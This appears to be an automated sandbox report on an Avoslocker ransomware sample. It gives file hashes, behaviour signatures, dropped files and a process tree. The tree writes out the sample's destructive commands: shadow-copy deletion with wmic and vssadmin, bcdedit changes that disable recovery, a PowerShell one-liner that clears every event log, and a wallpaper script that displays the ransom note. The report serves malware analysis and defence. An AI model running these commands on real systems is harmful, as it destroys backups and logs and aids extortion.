Resubmissions

18-04-2023 13:23

230418-qm9hxadd6t 10

18-04-2023 05:23

230418-f3g4gshg62 10

Analysis

  • max time kernel
    60s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    18-04-2023 05:23

General

  • Target

    794f3d25c42d383fad485f9af1d6d7c0508bcfe8ed80a1afea0e0b51bf92bc81.exe

  • Size

    807KB

  • MD5

    540a177a21044860e104dc2b0512a524

  • SHA1

    20014c52c83ed4cb87a2166ee77937684f1fbeb9

  • SHA256

    794f3d25c42d383fad485f9af1d6d7c0508bcfe8ed80a1afea0e0b51bf92bc81

  • SHA512

    234d9b2c9a4b204e4962a9ba02824dfb312347a10bf642642e804b43db91786b0509022c33a671b0dc68cc89ca38841ffd33d38cefa928b8f10af298cc0beac8

  • SSDEEP

    12288:0Z4s3rg9u/2/oT+NXtHLlP/O+OeO+OeNhBBhhBBAtHg9rjI+LXJ0ivlzkHBDsYAZ:u4s+oT+NXBLi0rjFXvyHBlbtCZa8

Malware Config

Signatures

  • Avoslocker Ransomware

    Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies extensions of user files 17 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\794f3d25c42d383fad485f9af1d6d7c0508bcfe8ed80a1afea0e0b51bf92bc81.exe
    "C:\Users\Admin\AppData\Local\Temp\794f3d25c42d383fad485f9af1d6d7c0508bcfe8ed80a1afea0e0b51bf92bc81.exe"
    1⤵
    • Modifies extensions of user files
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\system32\cmd.exe
      cmd /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2348
    • C:\Windows\system32\cmd.exe
      cmd /c vssadmin.exe Delete Shadows /All /Quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1936
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1056
    • C:\Windows\system32\cmd.exe
      cmd /c bcdedit /set {default} recoveryenabled No
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1944
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2572
    • C:\Windows\system32\cmd.exe
      cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1608
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2092
    • C:\Windows\system32\cmd.exe
      cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2540
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1040352102.png /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:3524
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
        3⤵
          PID:3336
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2736

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\GET_YOUR_FILES_BACK.txt

      Filesize

      1011B

      MD5

      9bcb42cd18f95356b2d1a1a4de0b5aad

      SHA1

      b03da5cab852e8fafc12a52e424ec4b10431270d

      SHA256

      6e66527651da97c609c697e763e165eaf0fa1da104c26d311ec48fec9950ae24

      SHA512

      85961b90024f25a20943f9ce3b3c0959ced373d7b548cfc533bb51164aa615125528352438ab43e4b285ab570268bb4ed46f861db89d29d830230b9f63b0f496

    • C:\Users\Admin\AppData\Local\Temp\1040352102.png

      Filesize

      32KB

      MD5

      fb93594c806f5b3b4cc627d1cbcc9327

      SHA1

      d4c29ca6106bad5409748e7f949ccff1b7d150cc

      SHA256

      fbc6e6163add1cc990cc92afea4883465ab09b9eef49390eab674aab6c296fbb

      SHA512

      73c0a84dad9854315d58fdc6a088c5fbf978dab3a2e193833afc72ddc83b1bf3d4a339310b51b96eb23934eb27e3379f3989f9502fcc882d2a298cf69282fc55

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      696f3c89816fa4e7f6b0d9b32f3fb40d

      SHA1

      ac72491c5b793ca8cfd6c6b522303371613181cd

      SHA256

      272601253ff2746a6c6b7e47dac459ab133cab33acff8a9db063c3279bf28e4b

      SHA512

      4a662690fc7ebad5a3a321d913726edb5014d533ab36ae0bb295b9e3980eb985b82394afb40d486c87d373dc0da5999d914bce67a8fe473e4fce80e3379c6a74

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K7CB0I1V55192Q6T34NP.temp

      Filesize

      7KB

      MD5

      696f3c89816fa4e7f6b0d9b32f3fb40d

      SHA1

      ac72491c5b793ca8cfd6c6b522303371613181cd

      SHA256

      272601253ff2746a6c6b7e47dac459ab133cab33acff8a9db063c3279bf28e4b

      SHA512

      4a662690fc7ebad5a3a321d913726edb5014d533ab36ae0bb295b9e3980eb985b82394afb40d486c87d373dc0da5999d914bce67a8fe473e4fce80e3379c6a74

    • \??\PIPE\srvsvc

      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • \Device\HarddiskVolume1\GET_YOUR_FILES_BACK.txt

      Filesize

      1011B

      MD5

      9bcb42cd18f95356b2d1a1a4de0b5aad

      SHA1

      b03da5cab852e8fafc12a52e424ec4b10431270d

      SHA256

      6e66527651da97c609c697e763e165eaf0fa1da104c26d311ec48fec9950ae24

      SHA512

      85961b90024f25a20943f9ce3b3c0959ced373d7b548cfc533bb51164aa615125528352438ab43e4b285ab570268bb4ed46f861db89d29d830230b9f63b0f496

    • memory/2540-24606-0x0000000002370000-0x0000000002378000-memory.dmp

      Filesize

      32KB

    • memory/2540-24605-0x000000001B270000-0x000000001B552000-memory.dmp

      Filesize

      2.9MB

    • memory/2540-24604-0x00000000025C0000-0x0000000002640000-memory.dmp

      Filesize

      512KB

    • memory/2540-24608-0x00000000025C0000-0x0000000002640000-memory.dmp

      Filesize

      512KB

    • memory/2540-24609-0x00000000025C0000-0x0000000002640000-memory.dmp

      Filesize

      512KB

    • memory/2564-2464-0x0000000002400000-0x0000000002480000-memory.dmp

      Filesize

      512KB

    • memory/2564-2461-0x0000000002400000-0x0000000002480000-memory.dmp

      Filesize

      512KB

    • memory/2564-1990-0x00000000022A0000-0x00000000022A8000-memory.dmp

      Filesize

      32KB

    • memory/2564-1977-0x000000001B190000-0x000000001B472000-memory.dmp

      Filesize

      2.9MB

    • memory/2564-1829-0x0000000002400000-0x0000000002480000-memory.dmp

      Filesize

      512KB

    • memory/2564-1798-0x0000000002400000-0x0000000002480000-memory.dmp

      Filesize

      512KB